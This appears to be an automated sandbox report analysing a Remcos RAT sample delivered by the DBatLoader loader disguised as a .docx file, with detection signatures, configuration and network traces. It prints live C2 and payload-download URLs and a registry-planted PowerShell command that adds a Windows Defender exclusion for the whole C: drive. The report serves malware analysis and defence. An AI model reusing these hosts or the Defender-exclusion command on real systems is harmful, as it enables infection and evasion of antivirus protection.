Windows Analysis Report
#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Overview

General Information

Sample name:	#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe renamed because original name is a hash value
Original sample name:	-202471.docx.pif.exe
Analysis ID:	1466663
MD5:	b9da5a47e1e68ef90c075dc14f8e2037
SHA1:	4ae96232817bf7b3919aa298efc7c0d18649ed9d
SHA256:	8dbccd1c7bdb8da3a34c2a4ac5c62fb6774ce2abac29caf899039d19a5d27555
Tags:	exepif
Infos:

Detection

Remcos, DBatLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Contains functionality to bypass UAC (CMSTPLUA)

Detected Remcos RAT

Detected unpacking (changes PE section rights)

Detected unpacking (creates a PE file in dynamic memory)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Remcos

Sigma detected: TrustedPath UAC Bypass Pattern

UAC bypass detected (Fodhelper)

Yara detected DBatLoader

Yara detected Remcos RAT

Yara detected UAC Bypass using CMSTP

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to detect sleep reduction / modifications

Contains functionality to register a low level keyboard hook

Contains functionality to steal Chrome passwords or cookies

Contains functionality to steal Firefox passwords or cookies

Contains functionalty to change the wallpaper

Creates a thread in another existing process (thread injection)

Delayed program exit found

Drops PE files to the user root directory

Drops PE files with a suspicious file extension

Drops executables to the windows directory (C:\Windows) and starts them

Drops or copies cmd.exe with a different name (likely to bypass HIPS)

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Opens the same file many times (likely Sandbox evasion)

Powershell is started from unusual location (likely to bypass HIPS)

Reads the Security eventlog

Reads the System eventlog

Sample uses process hollowing technique

Sigma detected: Execution from Suspicious Folder

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Parent in Public Folder Suspicious Process

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Suspicious Creation with Colorcpl

Uses an obfuscated file name to hide its real file extension (double extension)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a connection to the internet is available

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to communicate with device drivers

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to enumerate running services

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to launch a process as a different user

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: PSScriptPolicyTest Creation By Uncommon Process

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Reg Add Open Command

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name	Description	Attribution	Blogpost URLs	Link
DBatLoader	This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.	No Attribution	https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html https://blog.vincss.net/re016-malware-analysis-modiloader/ https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 https://isc.sans.edu/diary/Malspam+pushes+ModiLoader+DBatLoader+infection+for+Remcos+RAT/29896 https://kienmanowar.wordpress.com/2024/04/09/quicknote-phishing-email-distributes-warzone-rat-via-dbatloader/	https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Signatures

AV Detection

Antivirus detection for URL or domain

Source: www.vipguyclassproject2024.space

Avira URL Cloud: Label: malware

Found malware configuration

Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Malware Configuration Extractor: DBatLoader {"Download Url": ["https://wcmanagers.com/Er9/233_Pyemdbrdpps"]}
Source: 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: Remcos {"Host:Port:Password": "www.vipguyclassproject2024.space:2404:0", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-5MRRQ3", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Libraries\Pyemdbrd.PIF	ReversingLabs: Detection: 44%
Source: C:\Users\Public\Libraries\Pyemdbrd.PIF	Virustotal: Detection: 50%			Perma Link

Multi AV Scanner detection for submitted file

Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	ReversingLabs: Detection: 44%
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Virustotal: Detection: 50%			Perma Link

Yara detected Remcos RAT

Source: Yara match	File source: 31.2.colorcpl.exe.4580000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.64218af.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.64218af.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.4580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.6420000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.6420000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 7688, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\gaban\logs.dat, type: DROPPED

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.4% probability

Machine Learning detection for dropped file

Source: C:\Users\Public\Libraries\Pyemdbrd.PIF

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 31_2_045B3837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,

31_2_045B3837

Source: colorcpl.exe

Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 31.2.colorcpl.exe.4580000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.64218af.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.64218af.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.4580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.6420000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.6420000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 7688, type: MEMORYSTR

Privilege Escalation

Contains functionality to bypass UAC (CMSTPLUA)

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 31_2_045874FD _wcslen,CoGetObject,

31_2_045874FD

UAC bypass detected (Fodhelper)

Source: C:\Users\Public\ger.exe

Registry value created: NULL C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:"

Compliance

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Unpacked PE file: 0.2.#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe.2980000.1.unpack

Uses 32bit PE files

Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: unknown

HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49700 version: TLS 1.2

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: FodHelper.pdb source: extrac32.exe, 00000012.00000002.1282544160.000001FCCC830000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000022.00000002.1389829508.00007FF6EF4BB000.00000002.00000001.01000000.00000012.sdmp, per.exe, 00000022.00000000.1363110246.00007FF6EF4BB000.00000002.00000001.01000000.00000012.sdmp, per.exe.18.dr
Source:	Binary string: cmd.pdbUGP source: alpha.exe, 00000008.00000000.1264413808.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000A.00000000.1266008004.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000A.00000002.1267795392.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000C.00000000.1268349543.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000C.00000002.1277417828.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000E.00000000.1277719216.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000E.00000002.1280383467.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000011.00000002.1284778384.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000011.00000000.1280701556.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000015.00000002.1361948594.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000015.00000000.1285093557.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000017.00000000.1301865429.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000017.00000002.1305805578.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000026.00000000.1390985382.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000026.00000002.1397949450.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000002A.00000002.1415158264.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000002A.00000000.1400142537.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe.6.dr
Source:	Binary string: powershell.pdbUGP source: xkn.exe, 00000016.00000000.1285526824.00007FF6C891A000.00000002.00000001.01000000.00000008.sdmp, xkn.exe.15.dr
Source:	Binary string: easinvoker.pdbH source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: reg.pdb source: extrac32.exe, 0000000D.00000002.1276914690.00000178283A0000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000018.00000002.1302899439.00007FF7E0A10000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 00000018.00000000.1302258700.00007FF7E0A10000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.13.dr
Source:	Binary string: powershell.pdb source: xkn.exe, 00000016.00000000.1285526824.00007FF6C891A000.00000002.00000001.01000000.00000008.sdmp, xkn.exe.15.dr
Source:	Binary string: cmd.pdb source: alpha.exe, 00000008.00000000.1264413808.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000A.00000000.1266008004.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000A.00000002.1267795392.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000C.00000000.1268349543.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000C.00000002.1277417828.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000E.00000000.1277719216.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000E.00000002.1280383467.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000011.00000002.1284778384.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000011.00000000.1280701556.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000015.00000002.1361948594.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000015.00000000.1285093557.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000017.00000000.1301865429.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000017.00000002.1305805578.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000026.00000000.1390985382.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000026.00000002.1397949450.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000002A.00000002.1415158264.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000002A.00000000.1400142537.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe.6.dr
Source:	Binary string: FodHelper.pdbGCTL source: extrac32.exe, 00000012.00000002.1282544160.000001FCCC830000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000022.00000002.1389829508.00007FF6EF4BB000.00000002.00000001.01000000.00000012.sdmp, per.exe, 00000022.00000000.1363110246.00007FF6EF4BB000.00000002.00000001.01000000.00000012.sdmp, per.exe.18.dr
Source:	Binary string: reg.pdbGCTL source: extrac32.exe, 0000000D.00000002.1276914690.00000178283A0000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000018.00000002.1302899439.00007FF7E0A10000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 00000018.00000000.1302258700.00007FF7E0A10000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.13.dr

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_029858B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	0_2_029858B4
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	8_2_00007FF64B572978
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose,	8_2_00007FF64B587B4C
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	8_2_00007FF64B57823C
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	8_2_00007FF64B561560
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	8_2_00007FF64B5635B8
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	10_2_00007FF64B572978
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose,	10_2_00007FF64B587B4C
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	10_2_00007FF64B57823C
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	10_2_00007FF64B561560
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	10_2_00007FF64B5635B8
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	12_2_00007FF64B57823C
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	12_2_00007FF64B572978
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose,	12_2_00007FF64B587B4C
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	12_2_00007FF64B561560
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	12_2_00007FF64B5635B8
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	14_2_00007FF64B57823C
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	14_2_00007FF64B572978
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose,	14_2_00007FF64B587B4C
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	14_2_00007FF64B561560
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	14_2_00007FF64B5635B8
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	17_2_00007FF64B57823C
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	17_2_00007FF64B572978
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose,	17_2_00007FF64B587B4C
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	17_2_00007FF64B561560
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	17_2_00007FF64B5635B8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_04589665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	31_2_04589665
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_04589253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	31_2_04589253
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_0459C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	31_2_0459C291
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_0458C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	31_2_0458C34D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_0458BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	31_2_0458BD37
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045CE879 FindFirstFileExA,	31_2_045CE879
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_0458880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	31_2_0458880C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_0458783C FindFirstFileW,FindNextFileW,	31_2_0458783C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_04599AF5 FindFirstFileW,FindNextFileW,FindNextFileW,	31_2_04599AF5
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_0458BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	31_2_0458BB30

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 31_2_04587C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

31_2_04587C97

Source: C:\Users\Public\Libraries\drbdmeyP.pif	File opened: C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmp	Jump to behavior
Source: C:\Users\Public\Libraries\drbdmeyP.pif	File opened: C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmp\D2F8.tmp	Jump to behavior
Source: C:\Users\Public\Libraries\drbdmeyP.pif	File opened: C:\Users\user~1\	Jump to behavior
Source: C:\Users\Public\Libraries\drbdmeyP.pif	File opened: C:\Users\user\AppData\Local\Temp\D2F6.tmp	Jump to behavior
Source: C:\Users\Public\Libraries\drbdmeyP.pif	File opened: C:\Users\user~1\AppData\Local\	Jump to behavior
Source: C:\Users\Public\Libraries\drbdmeyP.pif	File opened: C:\Users\user~1\AppData\	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://wcmanagers.com/Er9/233_Pyemdbrdpps
Source: Malware configuration extractor	URLs: www.vipguyclassproject2024.space

Contains functionality to check if a connection to the internet is available

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Code function: 0_2_0299D028 InternetCheckConnectionA,

0_2_0299D028

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 108.170.55.202 108.170.55.202

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: SSASN2US SSASN2US

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /Er9/233_Pyemdbrdpps HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: wcmanagers.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
